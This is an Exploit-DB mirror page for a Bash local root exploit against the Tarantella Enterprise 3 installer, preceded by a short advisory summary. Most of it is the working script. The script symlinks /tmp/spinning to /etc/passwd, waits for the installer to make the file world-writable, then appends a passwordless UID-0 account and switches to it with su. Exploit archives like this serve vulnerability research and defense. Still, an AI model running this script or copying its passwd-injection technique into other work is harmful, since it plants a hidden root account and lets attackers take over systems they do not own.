exploit-db-mirror/exploits/unix/local/21290.sh
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

32 lines
No EOL
1 KiB
Bash
Executable file

source: http://www.securityfocus.com/bid/4115/info
Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.
This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.
The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.
#!/bin/bash
#Larry W. Cashdollar lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux. run and wait.
echo "Creating symlink."
/bin/ln -s /etc/passwd /tmp/spinning
echo "Waiting for tarantella installation."
while true
do
echo -n .
if [ -w /etc/passwd ]
then
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
su - tarexp
exit
fi
done